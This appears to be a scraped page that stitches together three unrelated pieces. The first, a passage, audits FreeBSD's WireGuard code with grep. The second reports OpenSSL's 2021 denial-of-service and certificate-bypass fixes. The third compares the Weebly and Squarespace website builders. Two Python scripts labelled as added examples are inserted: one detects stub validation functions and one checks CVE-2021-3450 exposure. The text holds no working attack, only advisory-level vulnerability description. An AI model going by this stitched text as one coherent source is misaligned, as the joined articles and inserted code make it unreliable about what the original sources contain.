This admission answers why such an experienced, qualified developer might produce inferior code—but it raises much larger questions about process and procedure within the FreeBSD core committee itself.

How did so much sub-par code make it so far into a major open source operating system? Where was the code review which should have stopped it? And why did both the FreeBSD core team and Netgate seem more focused on the fact that the code was being disparaged than its actual quality?

Code quality

The first issue is whether Macy’s code actually had significant problems. Donenfeld said that it did, and he identified a number of major issues:

  • Sleep to mitigate race conditions
  • Validation functions which simply return true
  • Catastrophic cryptographic vulnerabilities
  • Pieces of the wg protocol left unimplemented
  • Kernel panics
  • Security bypasses
  • Printf statements deep in crypto code
  • “Spectacular” buffer overflows
  • Mazes of Linux→FreeBSD ifdefs

But Netgate argued that Donenfeld had gone overboard with his negative assessment. The original Macy code, they argued, was simply not that bad.

Despite not having any kernel developers on staff, Ars was able to verify at least some of Donenfeld’s claims directly, quickly, and without external assistance. For instance, finding a validation function which simply returned true—and printf statements buried deep in cryptographic loops—required nothing more complicated than grep.

Empty validation function

In order to confirm or deny the claim of an empty validation function—one which always “returns true” rather than actually validating the data passed to it—we searched for instances of return true or return (true) in Macy’s if_wg code, as checked into FreeBSD 13.0-HEAD.

root@banshee:~/macy-freebsd-wg/sys/dev/if_wg# grep -ir 'return.*true' . | wc -l
21

This is a small enough number of returns to easily hand-audit, so we then used grep to find the same data but with three lines of code coming immediately before and after each return true:

root@banshee:~/macy-freebsd-wg/sys/dev/if_wg# grep -ir -A3 -B3 'return.*true' .

Among the valid uses of return true, we discovered one empty validation function, in module/module.c:

wg_allowedip_valid(const struct wg_allowedip *wip)
{

 return (true);
}

It’s probably worth mentioning that this empty validation function is not buried at the bottom of a sprawling mass of code—module.c as written is only 863 total lines of code.

We did not attempt to chase down the use of this function any further, but it appears to be intended to check whether a packet’s source and/or destination belongs to WireGuard’s allowed-ips list, which determines what packets may be routed down a given WireGuard tunnel.
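The grep audit above can be generalized into a small static check. The following Python script is an added example written for this page (it is not Ars’s or FreeBSD’s tooling): it flags any C function whose entire body is a constant-true return, tolerating the blank-line and `return (true);` styles seen in the excerpt, and marks hits whose name suggests a validator so a reviewer can triage them first. The sample source is constructed to mirror the module.c excerpt; `wg_key_valid` and `feature_enabled` are invented for the test and not real if_wg functions.

```python
import re
from dataclasses import dataclass
from pathlib import Path
from typing import Dict, List

# "name(...) {" tokens that are control statements, not function definitions.
_CONTROL_KEYWORDS = {"if", "while", "for", "switch"}
# Name fragments suggesting the function is meant to validate its input.
_VALIDATOR_HINTS = ("valid", "check", "verify")

# Comments are blanked (newlines kept) before scanning, so a "/* TODO */"
# left in an otherwise empty body does not hide the stub.
_COMMENT_RE = re.compile(r"/\*.*?\*/|//[^\n]*", re.DOTALL)

# A definition whose body is only "return true;", "return (true);" or
# "return 1;", with any whitespace or blank lines around it. Parameter lists
# with nested parentheses (function pointers) are not matched: a known limit.
_STUB_RE = re.compile(
    r"""
    \b([A-Za-z_]\w*)                     # 1: function name
    \s*\([^(){};]*\)                     # parameter list
    \s*\{\s*                             # opening brace, blank lines allowed
    return\s*\(?\s*(true|1)\s*\)?\s*;    # 2: the lone return statement
    \s*\}                                # closing brace right after it
    """,
    re.VERBOSE,
)


@dataclass
class StubHit:
    name: str
    line: int                   # 1-based line of the function name
    returns: str                # "true" or "1"
    looks_like_validator: bool  # name contains valid/check/verify


def find_stub_returns(source: str) -> List[StubHit]:
    """Return every function in `source` whose whole body is a constant-true return."""
    blanked = _COMMENT_RE.sub(lambda m: re.sub(r"[^\n]", " ", m.group(0)), source)
    hits: List[StubHit] = []
    for m in _STUB_RE.finditer(blanked):
        name = m.group(1)
        if name in _CONTROL_KEYWORDS:
            continue
        line = blanked.count("\n", 0, m.start(1)) + 1
        hits.append(StubHit(name, line, m.group(2),
                            any(h in name.lower() for h in _VALIDATOR_HINTS)))
    return hits


def scan_tree(root: str) -> Dict[str, List[StubHit]]:
    """Map each .c/.h file under `root` to the stub functions found in it."""
    report: Dict[str, List[StubHit]] = {}
    for path in sorted(Path(root).rglob("*")):
        if path.suffix in (".c", ".h"):
            hits = find_stub_returns(path.read_text(errors="replace"))
            if hits:
                report[str(path)] = hits
    return report


# Constructed sample (not the real if_wg sources): the shape of the module.c
# excerpt, plus functions that must NOT be flagged.
SAMPLE_C = """
static bool
wg_allowedip_valid(const struct wg_allowedip *wip)
{

    return (true);
}

/* A real validator: its body does more than return true. */
static bool
wg_key_valid(const uint8_t *key, size_t len)
{
    if (key == NULL) { return (true); }   /* control block, not a stub */
    return (len == 32);
}

static bool
feature_enabled(void)
{
    return true;  /* deliberate constant, not a validator */
}
"""
```

Running `scan_tree` over a checkout reports only the constant-true functions, so the reviewer hand-audits a handful of definitions instead of every `return true` in the tree.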

OpenSSL fixes high-severity flaw that allows hackers to crash servers — 2021年3月25日

OpenSSL fixes high-severity flaw that allows hackers to crash servers


OpenSSL, the most widely used software library for implementing website and email encryption, has patched a high-severity vulnerability that makes it easy for hackers to completely shut down huge numbers of servers.

OpenSSL provides time-tested cryptographic functions that implement the Transport Layer Security protocol, the successor to Secure Sockets Layer that encrypts data flowing between Internet servers and end-user clients. People developing applications that use TLS rely on OpenSSL to save time and avoid programming errors that are common when noncryptographers build applications that use complex encryption.

The crucial role OpenSSL plays in Internet security came into full view in 2014 when hackers began exploiting a critical vulnerability in the open source code library that let them steal encryption keys, customer information, and other sensitive data from servers all over the world. Heartbleed, as the security flaw was called, demonstrated how a couple lines of faulty code could topple the security of banks, news sites, law firms, and more.

Denial-of-service bug squashed

On Thursday, OpenSSL maintainers disclosed and patched a vulnerability that causes servers to crash when they receive a maliciously crafted request from an unauthenticated end user. CVE-2021-3449, as the denial-of-service vulnerability is tracked, is the result of a null pointer dereference bug. Cryptographic engineer Filippo Valsorda said on Twitter that the flaw could probably have been discovered earlier than now.

“Anyway, sounds like you can crash most OpenSSL servers on the Internet today,” he added.

Hackers can exploit the vulnerability by sending a server a maliciously formed renegotiating request during the initial handshake that establishes a secure connection between an end user and a server.

“An OpenSSL TLS server may crash if sent a maliciously crafted renegotiation ClientHello message from a client,” maintainers wrote in an advisory. “If a TLSv1.2 renegotiation ClientHello omits the signature_algorithms extension (where it was present in the initial ClientHello), but includes a signature_algorithms_cert extension then a NULL pointer dereference will result, leading to a crash and a denial of service attack.”

The maintainers have rated the severity high. Researchers reported the vulnerability to OpenSSL on March 17. Nokia developers Peter Kästle and Samuel Sapalski provided the fix.

Certificate verification bypass

OpenSSL also fixed a separate vulnerability that, in edge cases, prevented apps from detecting and rejecting TLS certificates that aren’t digitally signed by a browser-trusted certificate authority. The vulnerability, tracked as CVE-2021-3450, involves the interplay between an X509_V_FLAG_X509_STRICT flag found in the code and several parameters.

Thursday’s advisory explained:

If a “purpose” has been configured then there is a subsequent opportunity for checks that the certificate is a valid CA. All of the named “purpose” values implemented in libcrypto perform this check. Therefore, where a purpose is set the certificate chain will still be rejected even when the strict flag has been used. A purpose is set by default in libssl client and server certificate verification routines, but it can be overridden or removed by an application.

In order to be affected, an application must explicitly set the X509_V_FLAG_X509_STRICT verification flag and either not set a purpose for the certificate verification or, in the case of TLS client or server applications, override the default purpose.

OpenSSL versions 1.1.1h and newer are vulnerable. OpenSSL 1.0.2 is not impacted by this issue. Akamai researchers Xiang Ding and Benjamin Kaduk discovered and reported the bug, respectively. It was patched by Tomáš Mráz, a software developer who contracts with OpenSSL Software Services.

Apps that use a vulnerable OpenSSL version should upgrade to OpenSSL 1.1.1k as soon as possible.
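The following Python helper is an added triage check, not OpenSSL’s code: it encodes the conditions stated above (a library version from 1.1.1h up to but not including the fixed 1.1.1k, the X509_V_FLAG_X509_STRICT flag set, and no certificate purpose configured) so an operator can decide whether a given deployment is exposed to CVE-2021-3450 and needs the upgrade. The version strings it parses are in the format printed by `openssl version`; the purpose values passed in are constructed sample labels.

```python
import re
from typing import NamedTuple, Optional


class OpenSSLVersion(NamedTuple):
    major: int
    minor: int
    fix: int
    patch: str  # letter suffix such as "h"; "" when absent (sorts before "a")


_VERSION_RE = re.compile(r"OpenSSL\s+(\d+)\.(\d+)\.(\d+)([a-z]*)")


def parse_openssl_version(text: str) -> OpenSSLVersion:
    """Parse `openssl version` output such as 'OpenSSL 1.1.1j  16 Feb 2021'."""
    m = _VERSION_RE.search(text)
    if not m:
        raise ValueError(f"not an OpenSSL version string: {text!r}")
    return OpenSSLVersion(int(m[1]), int(m[2]), int(m[3]), m[4])


# Range stated in the article: 1.1.1h and newer are affected, fixed in 1.1.1k;
# the 1.0.2 branch is not impacted. Tuple ordering handles the letter suffix.
_FIRST_AFFECTED = OpenSSLVersion(1, 1, 1, "h")
_FIXED_IN = OpenSSLVersion(1, 1, 1, "k")


def version_affected_by_cve_2021_3450(version: OpenSSLVersion) -> bool:
    return _FIRST_AFFECTED <= version < _FIXED_IN


def app_exposed_to_cve_2021_3450(version_text: str, x509_strict: bool,
                                 purpose: Optional[str]) -> bool:
    """True only when BOTH advisory conditions hold: the linked library is in
    the affected range, and the application sets X509_V_FLAG_X509_STRICT while
    leaving no purpose configured (libssl sets one by default, so an app has
    to have overridden or removed it for `purpose` to be None here)."""
    version = parse_openssl_version(version_text)
    config_matches = x509_strict and purpose is None
    return version_affected_by_cve_2021_3450(version) and config_matches
```

An application that sets the strict flag but keeps a purpose (for example libssl’s default client or server purpose) still rejects a bad chain on an affected version, which is why the check requires both conditions.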

Weebly vs. Squarespace: How these top website builders really stack up against each other —

Weebly vs. Squarespace: How these top website builders really stack up against each other

Setting up a website for your business, blog, or personal portfolio can open up a ton of doors for you, both professionally and personally. When done properly, it can get your skills, talents, and goods in front of the eyes of those who need to see them most. That’s awesome! But it’s also a lot of pressure to hang on your website, and that can make things a little stressful (to say the least) when it comes to picking the perfect website builder for your needs.

While it can be tough to pick from the wide array of site builders out there, you’re already off to a great start by landing here, since Squarespace and Weebly are two of the best website builders to ever do it. However, where Squarespace is a bit more stylish and — dare we say — flashy, Weebly is a bit more understated, despite what its somewhat cutesy name might suggest. They’re quite similar overall, but they do differ in key ways that may make one more suited to your style or your particular website needs, whether it’s for drumming up interest in your small business, showcasing a portfolio or other creative freelance skill, or getting your thoughts and blogs out to a wider audience.


But before we dig into how they differ, let’s take a look at how much Squarespace and Weebly actually have in common:

  • Both provide their own easy-to-use website builder to make site customization seamless and easy, even for beginners with zero background in coding.

  • Both allow users to create websites that look great on mobile devices without any additional tweaking, and both provide incredible design flexibility, allowing users to change their templates at any time without losing information or having to rebuild from scratch. (Two key things we unfortunately cannot say about these platforms’ main competitor, Wix.)

  • Both also offer great blogging tools by default, as well as great ecommerce features to cater to all types of websites.

  • Squarespace and Weebly are on par with each other in terms of similar search engine optimization (SEO) tools to help land your site higher in search results, including easy editing of page title, description, and URL, as well as easy-to-understand guides to walk you through all the SEO stuff you need to know.

  • Both website builders allow you to easily link a custom domain from a third-party provider to your site. Otherwise, you can purchase your domain directly from Squarespace or Weebly, and both will give you your first year for free.

Point is, either one will get you set up with an attractive, professional-looking, and well-functioning website. However, each site builder differs in some key ways, so let’s dig into the race of Squarespace versus Weebly to see where one or the other pulls ahead depending on your individual needs or preferences.

Where Squarespace wins: Stunning visuals, better blogs, and stellar support

This should come as no surprise, as the website builder is probably most known for its aesthetic appeal, but at the visual level, Squarespace certainly takes the cake. There are more than a hundred designer Squarespace templates from which you can choose, each one sleeker and more stylish than the last. (But if you’re overwhelmed by the choice, you can use filters to narrow your search, or just look to our selection of the best Squarespace templates for some guidance.) This wealth of options makes the builder a really great choice for a stunning site with a modern, impressive design that feels really professional, but not in a stuffy way. If you’re seeking a certain aesthetic for your creative photography or video portfolio or eye-catching blog, Squarespace is the one for you.

An example of a blog template by Squarespace.


Speaking of blogs, Squarespace also comes out slightly on top in this realm as they offer more abundant and thoughtful blogging features, and a ton of great blog templates. Their AMP support helps sites load quickly on mobile devices, so your visitors can enjoy your content wherever they view it. You can also set up your blog to allow posts from multiple authors, which makes for great collaborative opportunities that you won’t find with Weebly. You also have the ability to insert podcasts into blog posts for even greater multimedia integration for your visitors to enjoy.

When it comes to helping their customers out, Squarespace boasts some pretty fantastic (and free!) customer support via both email and chat. They also have a great FAQ section and community forum, as well as workshops and webinars. Basically, they provide tons of different ways to learn how to make Squarespace work best for you. The only thing they don’t have is phone support, but we wouldn’t necessarily consider that a huge loss given all the other options.

Where Squarespace falls short: Potentially overwhelming interface and no free plan

Though it brings about some truly stylish results, Squarespace’s drag-and-drop interface isn’t super intuitive, so beginners may find themselves navigating a bit of a learning curve. This isn’t to say that it’s difficult to use or learn; it’s just that its minimalist design seems deceptively simple at first glance. Then you’ll come to find that just about every click presents you with a wealth of additional options, which can feel a little overwhelming straight out of the gate. However, as mentioned above, there are tons of tutorials out there, both from Squarespace and other users. It’s just a little unfortunate that the builder isn’t instantly intuitive in the way that Weebly is.

On the flip side, all of these customization options — from font styles and colors to visual spacing — are great for those users who want that type of flexibility. That said, it’s also incredibly easy to get carried away and tweak yourself into oblivion, resulting in a less visually appealing site, or one that no longer looks nice on mobile devices. Because of all these options, it’s important to strike the right balance when building your Squarespace site.

Along the same lines as customization, Squarespace does allow users to dig into CSS coding, but you’ll have to pay for a more expensive ecommerce plan to do so. And, speaking of price, there’s no free plan option here and monthly rates ranging from $12 to $40 are about twice the price of Weebly.

Squarespace has a good selection of third-party extensions, but they’re mostly for ecommerce.


Another downside to Squarespace is that they have a very limited app selection overall, and it’s kind of disappointing that they’re all from third-party developers. The Squarespace Extensions marketplace offers a few add-ons that are built in-house, but they’re mainly centered around ecommerce features.

And, lastly, a small, but common complaint in the SEO department is that Squarespace’s Alt-text is confusingly called “file name.” This is the space where you’ll want to describe your pictures in words, so it’s not really the file name, but alas, that’s what Squarespace calls it.

Where Weebly wins: Ease of use, coding control, and a free plan

When it comes to ease of use, Weebly is the clear winner thanks to its incredibly intuitive interface that is quite possibly the easiest website builder in the game. Not that Squarespace is necessarily difficult, but it certainly has more nuances when placed in direct comparison with Weebly. All you need to do to make your site is select elements from the builder’s sidebar and drop them where you want. Done and done. It’s a very straightforward process that ensures you can’t really go overboard with tweaks and edits, which makes it the perfect choice for beginners. However, all Weebly templates also feature an Advanced Theme Editor, so you do have the option to dig into the coding if you have some knowledge and desire to do so. Weebly offers full HTML and CSS control, unlike Squarespace, but you’ll want to be equally aware of making too many changes so as not to mess with the site’s mobile responsiveness. And, if you want your site to also have a blog, Weebly makes it super easy to edit it in the same style as your regular site pages for a cohesive and stylish visitor experience.

Weebly’s optional code editor allows users to customize themes.


Another win for Weebly is its offering of hundreds of high-quality apps that can be installed easily with just one click. Plus, many of them are built in-house so you can trust that they will always integrate seamlessly. These include, but are not limited to apps that’ll make your site more social, like live chat and polls; additions to boost your sales, like email campaigns and customer reviews; and other options to drive more traffic to your site. A good amount of the apps are free to use with your site, but some are premium and require an additional fee.

If you’re running an ecommerce site with Weebly, you’ll also be pleased to find that they have an automatic tax calculator for online shops in the United States. This is something you won’t find with any Squarespace plan, not even the top-tier Advanced Commerce option. Weebly also integrates a few more payment options, like Authorize.net and Square, in addition to Stripe and PayPal (which are the only two options on Squarespace). For these benefits, Weebly is a great choice for those who’ll be using their website to set up shop with a small- to medium-sized ecommerce business.

Best of all, Weebly offers a free plan so you can get your site up and running without any worries, and their paid plans are quite affordable, ranging from as low as $6 to $26 per month.

Where Weebly falls short: Fewer templates and less helpful user guides

With roughly half the number of templates — or themes — as Squarespace, you may feel a little limited by Weebly’s out-of-the-box designs. They are attractive and high-quality, for sure, though they may not be quite as visually impressive as Squarespace’s offerings. However, they are organized into easy-to-browse categories based on use, like those best-suited for an online store, portfolio, event, or blog.

Weebly’s templates are as attractive as Squarespace’s, but there just aren’t as many of them.


Speaking of blogs, that brings us to what may be another pain point for some. You can only have one author for your blog, so Weebly is not ideal for collaborative efforts in that regard.

Some may also consider Weebly’s customer service to be the “loser” in this direct Squarespace comparison. However, don’t get us wrong: Weebly’s customer support offerings are great. You can get in touch with them for free via email, chat, and, unlike Squarespace, phone support. They also have a great FAQ section and community forum. However, their Help Center guides do leave a bit to be desired, at least in comparison to Squarespace’s abundance of support offerings. (Then again, using Weebly is a lot more straightforward, so it doesn’t necessarily require such detailed guides.)

And finally, we may be nitpicking just a little bit here, but Weebly requires an extra plugin to use headers, like H2, H3, etc. Utilizing these properly can help out your SEO efforts, so not having them readily available for use is a little annoying, though not the end of the world.

The final word on Squarespace vs. Weebly

So who wins? Well, it’s kind of a toss-up. Both Squarespace and Weebly excel in helping users create incredibly attractive, yet still very functional sites in relatively easy ways, though Weebly is more suitable for true beginners. Though users do not need any coding knowledge to tweak their sites when website building, both offer tools to help dig into customization and really make the site feel more personal. Weebly gets the slight edge in this sense, as well, due to its code editor being accessible to all, but not required for site customization. And while Squarespace has the better blogging tools, Weebly gets the win for ecommerce sites.

On the one hand, Squarespace is particularly excellent for those in creative fields who are seeking a certain visual aesthetic that will really impress their visitors. It’s also the better choice for bloggers. On the other hand, Weebly is a fantastic choice for those who need something simple and free, as well as those who are setting up an online shop. So when it comes to a winner, it really depends on what you need, who you want your website to cater to, and what you’re willing to spend. Either way, you’ll make a great choice with either Squarespace or Weebly as your website builder.